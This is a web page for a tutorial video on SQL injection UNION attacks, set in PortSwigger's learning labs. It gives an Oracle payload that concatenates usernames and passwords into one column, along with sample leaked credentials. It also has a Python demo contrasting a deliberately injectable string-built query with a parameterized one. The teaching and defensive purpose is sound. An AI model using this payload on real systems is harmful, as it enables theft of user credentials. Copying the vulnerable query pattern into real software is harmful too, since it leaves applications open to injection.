SQL injection UNION attack: retrieving multiple values in a single column


Retrieving multiple values within a single column

In the preceding example, suppose instead that the query only returns a single column.

You can easily retrieve multiple values together within this single column by concatenating the values together, ideally including a suitable separator to let you distinguish the combined values. For example, on Oracle you could submit the input:

' UNION SELECT username || '~' || password FROM users--

This uses the double-pipe sequence || which is a string concatenation operator on Oracle. The injected query concatenates together the values of the username and password fields, separated by the ~ character.

The results from the query will let you read all of the usernames and passwords, for example:

...
administrator~s3cure
wiener~peter
carlos~montoya
...

Note that different databases use different syntax to perform string concatenation. For more details, see the SQL injection cheat sheet.
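
An added example, not taken from the video or from PortSwigger's lab: the payload above is run against a constructed in-memory SQLite database, first through a string-built single-column query and then through a parameterized one. SQLite as a stand-in for Oracle, the table layout, the sample rows and all function names are assumptions.

```python
import sqlite3

# The page's payload, verbatim. SQLite stands in for Oracle here (assumption):
# it also uses || for concatenation and -- for comments.
PAYLOAD = "' UNION SELECT username || '~' || password FROM users--"

def make_db():
    """Constructed sample data; the users mirror the page's sample output."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, category TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES ('Umbrella', 'Gifts'), ('Mug', 'Gifts');
        INSERT INTO users VALUES ('administrator', 's3cure'),
                                 ('wiener', 'peter'), ('carlos', 'montoya');
    """)
    return db

def vulnerable_lookup(db, category):
    # Input is pasted into the SQL text, so its quote closes the string
    # literal and the rest is parsed as SQL.
    sql = "SELECT name FROM products WHERE category = '" + category + "'"
    return [row[0] for row in db.execute(sql)]

def parameterized_lookup(db, category):
    # Input is bound as a value and is never parsed as SQL.
    sql = "SELECT name FROM products WHERE category = ?"
    return [row[0] for row in db.execute(sql, (category,))]

def split_rows(rows, sep="~"):
    """Split each combined value at the first separator; ambiguous if a
    username itself contains the separator."""
    return [tuple(r.split(sep, 1)) for r in rows if sep in r]

if __name__ == "__main__":
    db = make_db()
    leaked = vulnerable_lookup(db, PAYLOAD)
    print("string-built query:", sorted(leaked))
    print("split pairs:", sorted(split_rows(leaked)))
    print("parameterized query:", parameterized_lookup(db, PAYLOAD))
    print("parameterized, normal input:", parameterized_lookup(db, "Gifts"))
```

With the parameterized form the whole payload is compared against the category column as an ordinary string, so no rows match and the UNION never executes.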

---------------------------------------------------
In this video, CyberWorldSec shows you how to check for SQL injection.


Disclaimer :

These materials are for educational and research purposes only.

These videos teach you cyber security, and all the practicals are conducted on safe-to-test learning labs provided by PortSwigger's Web Security Academy.

Comments

Not the best quality, but he did explain it very well! Thank you!

alexandercoen